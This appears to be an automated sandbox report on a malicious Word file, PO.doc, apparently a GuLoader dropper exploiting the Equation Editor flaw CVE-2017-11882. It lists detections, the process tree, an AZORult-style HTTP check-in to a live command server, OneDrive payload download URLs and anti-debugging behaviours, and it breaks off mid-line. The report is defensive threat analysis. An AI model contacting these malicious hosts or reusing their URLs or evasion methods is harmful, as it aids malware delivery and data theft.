
Analysis Report PO.doc

Overview

General Information

Sample Name: PO.doc
Analysis ID: 288932
MD5: c7b96591a6e4dea501b8ab1eb546682f
SHA1: 7bbdf38ec3d54d9220d3523a551bb5e59fd3664a
SHA256: bfd904bca6651f85d90eda740da722d60d6b28e24e1f4ea859d5f021c4a9b4fe
Tags: doc

Detection

GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: File Dropped By EQNEDT32EXE
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected GuLoader
Contains functionality to hide a thread from the debugger
Hides threads from debuggers
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Yara detected VB6 Downloader Generic
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
PE file contains strange resources
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Startup

  • System is w7x64
  • WINWORD.EXE (PID: 1888 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)
  • EQNEDT32.EXE (PID: 1320 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • jknbdpaq.exe (PID: 1472 cmdline: C:\Users\user\AppData\Roaming\jknbdpaq.exe MD5: ED5C029E13A88CD8A2ECD9F48B9A83B7)
      • jknbdpaq.exe (PID: 2416 cmdline: C:\Users\user\AppData\Roaming\jknbdpaq.exe MD5: ED5C029E13A88CD8A2ECD9F48B9A83B7)
  • EQNEDT32.EXE (PID: 2924 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000005.00000002.2100926279.00000000001B0000.00000040.00000001.sdmp | JoeSecurity_GuLoader | Yara detected GuLoader | Joe Security |
Process Memory Space: jknbdpaq.exe PID: 2416 | JoeSecurity_VB6DownloaderGeneric | Yara detected VB6 Downloader Generic | Joe Security |
Process Memory Space: jknbdpaq.exe PID: 2416 | JoeSecurity_GuLoader | Yara detected GuLoader | Joe Security |
Process Memory Space: jknbdpaq.exe PID: 1472 | JoeSecurity_VB6DownloaderGeneric | Yara detected VB6 Downloader Generic | Joe Security |
Process Memory Space: jknbdpaq.exe PID: 1472 | JoeSecurity_GuLoader | Yara detected GuLoader | Joe Security |

Sigma Overview

System Summary:

Sigma detected: Droppers Exploiting CVE-2017-11882
Source: Process started, Author: Florian Roth, Data: Command: C:\Users\user\AppData\Roaming\jknbdpaq.exe, CommandLine: C:\Users\user\AppData\Roaming\jknbdpaq.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\jknbdpaq.exe, NewProcessName: C:\Users\user\AppData\Roaming\jknbdpaq.exe, OriginalFileName: C:\Users\user\AppData\Roaming\jknbdpaq.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 1320, ProcessCommandLine: C:\Users\user\AppData\Roaming\jknbdpaq.exe, ProcessId: 1472
Sigma detected: File Dropped By EQNEDT32EXE
Source: File created, Author: Joe Security, Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 1320, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\angelwe[1].exe

Signature Overview

AV Detection:

Antivirus / Scanner detection for submitted sample
Source: PO.doc, Avira: detected
Multi AV Scanner detection for domain / URL
Source: hotelavlokan.com, Virustotal: Detection: 10%
Source: http://hotelavlokan.com/angel/PL341/index.php, Virustotal: Detection: 6%
Multi AV Scanner detection for submitted file
Source: PO.doc, Virustotal: Detection: 48%

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Process created: C:\Users\user\AppData\Roaming\jknbdpaq.exe
Source: unknown, Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: global traffic, DNS query: name: www.uttaranchaltoday.com
Source: global traffic, TCP traffic: 192.168.2.22:49165 -> 104.28.1.185:443

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic, Snort IDS: 2029405 ET TROJAN Win32/AZORult V3.3 Client Checkin M2 192.168.2.22:49168 -> 104.28.24.76:80
Source: Joe Sandbox View, ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View, JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
Source: global traffic, HTTP traffic detected: POST /angel/PL341/index.php HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1) Host: hotelavlokan.com Content-Length: 105 Cache-Control: no-cache Data Raw: 00 00 00 26 66 96 42 11 8b 30 64 8b 30 62 ec 26 66 99 40 70 9c 47 70 9d 30 70 9d 37 70 9d 30 14 8b 30 67 eb 40 70 9d 35 70 9c 47 16 8b 30 65 8b 30 63 8b 30 65 8b 30 67 ed 41 70 9d 36 70 9c 47 70 9d 3b 70 9d 34 70 9d 37 13 8b 30 6d 8b 30 64 ed 26 66 98 26 67 ea 26 66 96 26 66 9d 26 66 9b 26 66 97 42 13 8b 30 64 ec Data Ascii: &fB0d0b&f@pGp0p7p00g@p5pG0e0c0e0gAp6pGp;p4p70m0d&f&g&f&f&f&fB0d
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{B4F37B13-97C0-4A14-814E-1968BCE52029}.tmp
Source: jknbdpaq.exe, 00000005.00000002.2101760081.0000000000910000.00000004.00000020.sdmp, String found in binary or memory: /moc.nideknil.wwwwww.linkedin.com equals www.linkedin.com (Linkedin)
Source: jknbdpaq.exe, 00000004.00000002.2098318417.00000000030F0000.00000002.00000001.sdmp, String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: jknbdpaq.exe, 00000005.00000002.2101760081.0000000000910000.00000004.00000020.sdmp, String found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
Source: jknbdpaq.exe, 00000005.00000002.2101804777.000000000095A000.00000004.00000020.sdmp, String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: unknown, DNS traffic detected: queries for: www.uttaranchaltoday.com
Source: jknbdpaq.exe, 00000005.00000002.2101804777.000000000095A000.00000004.00000020.sdmp, String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: jknbdpaq.exe, 00000005.00000002.2101804777.000000000095A000.00000004.00000020.sdmp, String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: jknbdpaq.exe, 00000005.00000002.2101804777.000000000095A000.00000004.00000020.sdmp, String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: jknbdpaq.exe, 00000005.00000002.2101804777.000000000095A000.00000004.00000020.sdmp, String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: jknbdpaq.exe, 00000005.00000002.2101804777.000000000095A000.00000004.00000020.sdmp, String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: jknbdpaq.exe, 00000005.00000002.2101804777.000000000095A000.00000004.00000020.sdmp, String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: jknbdpaq.exe, 00000005.00000002.2101804777.000000000095A000.00000004.00000020.sdmp, String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
Source: jknbdpaq.exe, 00000005.00000002.2101777111.0000000000935000.00000004.00000020.sdmp, String found in binary or memory: http://hotelavlokan.com/angel/PL341/index.php
Source: jknbdpaq.exe, 00000005.00000003.2100759395.000000001E7A0000.00000004.00000001.sdmp, String found in binary or memory: http://hotelavlokan.com/angel/PL341/index.phpA
Source: jknbdpaq.exe, 00000005.00000002.2101777111.0000000000935000.00000004.00000020.sdmp, String found in binary or memory: http://hotelavlokan.com/angel/PL341/index.phpw
Source: jknbdpaq.exe, 00000004.00000002.2098318417.00000000030F0000.00000002.00000001.sdmp, String found in binary or memory: http://investor.msn.com
Source: jknbdpaq.exe, 00000004.00000002.2098318417.00000000030F0000.00000002.00000001.sdmp, String found in binary or memory: http://investor.msn.com/
Source: jknbdpaq.exe, 00000004.00000002.2098536832.00000000032D7000.00000002.00000001.sdmp, String found in binary or memory: http://localizability/practices/XML.asp
Source: jknbdpaq.exe, 00000004.00000002.2098536832.00000000032D7000.00000002.00000001.sdmp, String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: jknbdpaq.exe, 00000005.00000002.2101804777.000000000095A000.00000004.00000020.sdmp, String found in binary or memory: http://ocsp.comodoca.com0
Source: jknbdpaq.exe, 00000005.00000002.2101804777.000000000095A000.00000004.00000020.sdmp, String found in binary or memory: http://ocsp.comodoca.com0%
Source: jknbdpaq.exe, 00000005.00000002.2101804777.000000000095A000.00000004.00000020.sdmp, String found in binary or memory: http://ocsp.comodoca.com0-
Source: jknbdpaq.exe, 00000005.00000002.2101804777.000000000095A000.00000004.00000020.sdmp, String found in binary or memory: http://ocsp.comodoca.com0/
Source: jknbdpaq.exe, 00000005.00000002.2101804777.000000000095A000.00000004.00000020.sdmp, String found in binary or memory: http://ocsp.comodoca.com05
Source: jknbdpaq.exe, 00000005.00000002.2101804777.000000000095A000.00000004.00000020.sdmp, String found in binary or memory: http://ocsp.digicert.com0:
Source: jknbdpaq.exe, 00000005.00000002.2101804777.000000000095A000.00000004.00000020.sdmp, String found in binary or memory: http://ocsp.entrust.net03
Source: jknbdpaq.exe, 00000005.00000002.2101804777.000000000095A000.00000004.00000020.sdmp, String found in binary or memory: http://ocsp.entrust.net0D
Source: jknbdpaq.exe, 00000005.00000002.2101804777.000000000095A000.00000004.00000020.sdmp, String found in binary or memory: http://ocsp.msocsp.com0
Source: jknbdpaq.exe, 00000004.00000002.2098536832.00000000032D7000.00000002.00000001.sdmp, String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: jknbdpaq.exe, 00000004.00000002.2098536832.00000000032D7000.00000002.00000001.sdmp, String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: jknbdpaq.exe, 00000005.00000002.2101804777.000000000095A000.00000004.00000020.sdmp, String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: jknbdpaq.exe, 00000005.00000002.2101804777.000000000095A000.00000004.00000020.sdmp, String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: jknbdpaq.exe, 00000004.00000002.2098318417.00000000030F0000.00000002.00000001.sdmp, String found in binary or memory: http://www.hotmail.com/oe
Source: jknbdpaq.exe, 00000004.00000002.2098536832.00000000032D7000.00000002.00000001.sdmp, String found in binary or memory: http://www.icra.org/vocabulary/.
Source: jknbdpaq.exe, 00000004.00000002.2098318417.00000000030F0000.00000002.00000001.sdmp, String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: jknbdpaq.exe, 00000004.00000002.2098318417.00000000030F0000.00000002.00000001.sdmp, String found in binary or memory: http://www.windows.com/pctv.
Source: jknbdpaq.exe, 00000005.00000002.2101760081.0000000000910000.00000004.00000020.sdmp, String found in binary or memory: https://onedrive.live.com/
Source: jknbdpaq.exe, 00000005.00000002.2101760081.0000000000910000.00000004.00000020.sdmp, String found in binary or memory: https://onedrive.live.com/$C
Source: jknbdpaq.exe, 00000005.00000002.2101777111.0000000000935000.00000004.00000020.sdmp, String found in binary or memory: https://onedrive.live.com/download?cid=4C3F5C65A99DA195&resid=4C3F5C65A99DA195%21189&authkey=AGDK6_h
Source: jknbdpaq.exe, 00000005.00000002.2101804777.000000000095A000.00000004.00000020.sdmp, String found in binary or memory: https://secure.comodo.com/CPS0
Source: jknbdpaq.exe, 00000005.00000002.2101804777.000000000095A000.00000004.00000020.sdmp, String found in binary or memory: https://vim0zq.bl.files.1drv.com/
Source: jknbdpaq.exe, 00000005.00000002.2101797169.0000000000952000.00000004.00000020.sdmp, jknbdpaq.exe, 00000005.00000002.2101844259.000000000099C000.00000004.00000020.sdmp, String found in binary or memory: https://vim0zq.bl.files.1drv.com/y4mJ4JmV_odR7SEu2rvz5t4QuptNc14KJHuH0VZBkduvbWYhfVMcLlD4VMfJs8z3lly
Source: jknbdpaq.exe, 00000005.00000002.2101804777.000000000095A000.00000004.00000020.sdmp, String found in binary or memory: https://www.digicert.com/CPS0
Source: unknown, Network traffic detected: HTTP traffic on port 49165 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49165

System Summary:

Office equation editor drops PE file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\angelwe[1].exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, File created: C:\Users\user\AppData\Roaming\jknbdpaq.exe
Source: C:\Users\user\AppData\Roaming\jknbdpaq.exe, Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\jknbdpaq.exe, Memory allocated: 76D20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\jknbdpaq.exe, Code function: 4_2_002A0212 EnumWindows,NtSetInformationThread,CloseServiceHandle,TerminateProcess, 4_2_002A0212
Source: C:\Users\user\AppData\Roaming\jknbdpaq.exe, Code function: 4_2_002A3772 NtProtectVirtualMemory, 4_2_002A3772
Source: C:\Users\user\AppData\Roaming\jknbdpaq.exe, Code function: 4_2_002A0B56 NtWriteVirtualMemory, 4_2_002A0B56
Source: C:\Users\user\AppData\Roaming\jknbdpaq.exe, Code function: 4_2_002A3ABF NtResumeThread, 4_2_002A3ABF
Source: C:\Users\user\AppData\Roaming\jknbdpaq.exe, Code function: 4_2_002A1DCA NtSetInformationThread,CloseServiceHandle,TerminateProcess,LoadLibraryA, 4_2_002A1DCA
Source: C:\Users\user\AppData\Roaming\jknbdpaq.exe, Code function: 4_2_002A102B NtWriteVirtualMemory, 4_2_002A102B
Source: C:\Users\user\AppData\Roaming\jknbdpaq.exe, Code function: 4_2_002A160F NtWriteVirtualMemory, 4_2_002A160F
Source: C:\Users\user\AppData\Roaming\jknbdpaq.exe, Code function: 4_2_002A3B1A NtResumeThread, 4_2_002A3B1A
Source: C:\Users\user\AppData\Roaming\jknbdpaq.exe, Code function: 4_2_002A2C18 NtSetInformationThread,CloseServiceHandle,TerminateProcess, 4_2_002A2C18
Source: C:\Users\user\AppData\Roaming\jknbdpaq.exe, Code function: 4_2_002A2B6E NtSetInformationThread,CloseServiceHandle,TerminateProcess, 4_2_002A2B6E
Source: C:\Users\user\AppData\Roaming\jknbdpaq.exe, Code function: 4_2_002A028A NtSetInformationThread,CloseServiceHandle,TerminateProcess, 4_2_002A028A
Source: C:\Users\user\AppData\Roaming\jknbdpaq.exe, Code function: 4_2_002A3B87 NtResumeThread, 4_2_002A3B87
Source: C:\Users\user\AppData\Roaming\jknbdpaq.exe, Code function: 4_2_002A14EA NtWriteVirtualMemory, 4_2_002A14EA
Source: C:\Users\user\AppData\Roaming\jknbdpaq.exe, Code function: 4_2_002A3BED NtResumeThread, 4_2_002A3BED
Source: C:\Users\user\AppData\Roaming\jknbdpaq.exe, Code function: 4_2_002A15FC NtWriteVirtualMemory, 4_2_002A15FC
Source: C:\Users\user\AppData\Roaming\jknbdpaq.exe, Code function: 4_2_002A14FD NtWriteVirtualMemory, 4_2_002A14FD
Source: C:\Users\user\AppData\Roaming\jknbdpaq.exe, Code function: 4_2_002A16F5 NtWriteVirtualMemory, 4_2_002A16F5
Source: C:\Users\user\AppData\Roaming\jknbdpaq.exe, Code function: 4_2_002A3AC9 NtResumeThread, 4_2_002A3AC9
Source: C:\Users\user\AppData\Roaming\jknbdpaq.exe, Code function: 5_2_001B0212 EnumWindows,NtSetInformationThread,CloseServiceHandle, 5_2_001B0212
Source: C:\Users\user\AppData\Roaming\jknbdpaq.exe, Code function: 5_2_001B3772 NtProtectVirtualMemory, 5_2_001B3772
Source: C:\Users\user\AppData\Roaming\jknbdpaq.exe, Code function: 5_2_001B129A RtlAddVectoredExceptionHandler,NtProtectVirtualMemory,NtProtectVirtualMemory, 5_2_001B129A
Source: C:\Users\user\AppData\Roaming\jknbdpaq.exe, Code function: 5_2_001B3ABF NtSetInformationThread, 5_2_001B3ABF
Source: C:\Users\user\AppData\Roaming\jknbdpaq.exe, Code function: 5_2_001B1AF8 NtProtectVirtualMemory, 5_2_001B1AF8
Source: C:\Users\user\AppData\Roaming\jknbdpaq.exe, Code function: 5_2_001B3B1A NtSetInformationThread, 5_2_001B3B1A
Source: C:\Users\user\AppData\Roaming\jknbdpaq.exe, Code function: 5_2_001B2C18 NtSetInformationThread,CloseServiceHandle, 5_2_001B2C18
Source: C:\Users\user\AppData\Roaming\jknbdpaq.exe, Code function: 5_2_001B1254 NtProtectVirtualMemory, 5_2_001B1254
Source: C:\Users\user\AppData\Roaming\jknbdpaq.exe, Code function: 5_2_001B2B6E NtSetInformationThread,CloseServiceHandle, 5_2_001B2B6E
Source: C:\Users\user\AppData\Roaming\jknbdpaq.exe, Code function: 5_2_001B028A NtSetInformationThread,CloseServiceHandle, 5_2_001B028A
Source: C:\Users\user\AppData\Roaming\jknbdpaq.exe, Code function: 5_2_001B3B87 NtSetInformationThread, 5_2_001B3B87
Source: C:\Users\user\AppData\Roaming\jknbdpaq.exe, Code function: 5_2_001B05B5 NtProtectVirtualMemory,LoadLibraryA, 5_2_001B05B5
Source: C:\Users\user\AppData\Roaming\jknbdpaq.exe, Code function: 5_2_001B12D4 NtProtectVirtualMemory, 5_2_001B12D4
Source: C:\Users\user\AppData\Roaming\jknbdpaq.exe, Code function: 5_2_001B3AC9 NtSetInformationThread, 5_2_001B3AC9
Source: C:\Users\user\AppData\Roaming\jknbdpaq.exe, Code function: 5_2_001B1AFE NtProtectVirtualMemory, 5_2_001B1AFE
Source: C:\Users\user\AppData\Roaming\jknbdpaq.exe, Code function: 5_2_001B3BED NtSetInformationThread, 5_2_001B3BED
Source: C:\Users\user\AppData\Roaming\jknbdpaq.exe, Code function: 4_2_00405258 4_2_00405258
Source: C:\Users\user\AppData\Roaming\jknbdpaq.exe, Code function: 4_2_00405274 4_2_00405274
Source: C:\Users\user\AppData\Roaming\jknbdpaq.exe, Code function: 4_2_00405216 4_2_00405216
Source: C:\Users\user\AppData\Roaming\jknbdpaq.exe, Code function: 4_2_0040522E 4_2_0040522E
Source: C:\Users\user\AppData\Roaming\jknbdpaq.exe, Code function: 4_2_0040529A 4_2_0040529A
Source: C:\Users\user\AppData\Roaming\jknbdpaq.exe, Code function: 4_2_00405172 4_2_00405172
Source: C:\Users\user\AppData\Roaming\jknbdpaq.exe, Code function: 4_2_00402932 4_2_00402932
Source: C:\Users\user\AppData\Roaming\jknbdpaq.exe, Code function: 4_2_004051EA 4_2_004051EA
Source: C:\Users\user\AppData\Roaming\jknbdpaq.exe, Code function: 4_2_002A2B6E 4_2_002A2B6E
Source: C:\Users\user\AppData\Roaming\jknbdpaq.exe, Code function: 5_2_001B2B6E 5_2_001B2B6E
Source: angelwe[1].exe.2.dr, Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: jknbdpaq.exe.2.dr, Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: jknbdpaq.exe, 00000004.00000002.2098318417.00000000030F0000.00000002.00000001.sdmp, Binary or memory string: .VBPud<_
Source: classification engine, Classification label: mal100.troj.expl.evad.winDOC@7/11@4/2
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, File created: C:\Users\user\Desktop\~$PO.doc
Source: C:\Users\user\AppData\Roaming\jknbdpaq.exe, Mutant created: \Sessions\1\BaseNamedObjects\A8AD17B7C-343A2EC6-C0602CB5-874F81C6-8359AF1B
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, File created: C:\Users\user\AppData\Local\Temp\CVRCD6C.tmp
Source: C:\Users\user\AppData\Roaming\jknbdpaq.exe, Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, File read: C:\Users\desktop.ini
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\jknbdpaq.exe, File read: C:\Windows\System32\drivers\etc\hosts
Source: PO.doc, Virustotal: Detection: 48%
Source: unknown, Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknown, Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: unknown, Process created: C:\Users\user\AppData\Roaming\jknbdpaq.exe C:\Users\user\AppData\Roaming\jknbdpaq.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Process created: C:\Users\user\AppData\Roaming\jknbdpaq.exe C:\Users\user\AppData\Roaming\jknbdpaq.exe
Source: C:\Users\user\AppData\Roaming\jknbdpaq.exe, Process created: C:\Users\user\AppData\Roaming\jknbdpaq.exe C:\Users\user\AppData\Roaming\jknbdpaq.exe
Source: C:\Users\user\AppData\Roaming\jknbdpaq.exe, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{DCB00C01-570F-4A9B-8D69-199FDBA5723B}\InProcServer32
Source: Window Recorder, Window detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Data Obfuscation:

Yara detected GuLoader
Source: Yara match, File source: 00000005.00000002.2100926279.00000000001B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: Process Memory Space: jknbdpaq.exe PID: 2416, type: MEMORY
Source: Yara match, File source: Process Memory Space: jknbdpaq.exe PID: 1472, type: MEMORY
Yara detected VB6 Downloader Generic
Source: Yara match, File source: Process Memory Space: jknbdpaq.exe PID: 2416, type: MEMORY
Source: Yara match, File source: Process Memory Space: jknbdpaq.exe PID: 1472, type: MEMORY
Source: C:\Users\user\AppData\Roaming\jknbdpaq.exe, Code function: 4_2_002A2C89 pushfd ; retf 4_2_002A2C96
Source: C:\Users\user\AppData\Roaming\jknbdpaq.exe, Code function: 5_2_001B2C89 pushfd ; retf 5_2_001B2C96
Source: C:\Users\user\AppData\Roaming\jknbdpaq.exe, Code function: 5_2_001B26F7 push esp; iretd 5_2_001B26F8
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\angelwe[1].exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, File created: C:\Users\user\AppData\Roaming\jknbdpaq.exe
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, Process information set: NOOPENFILEERRORBOX
Source: C:\Program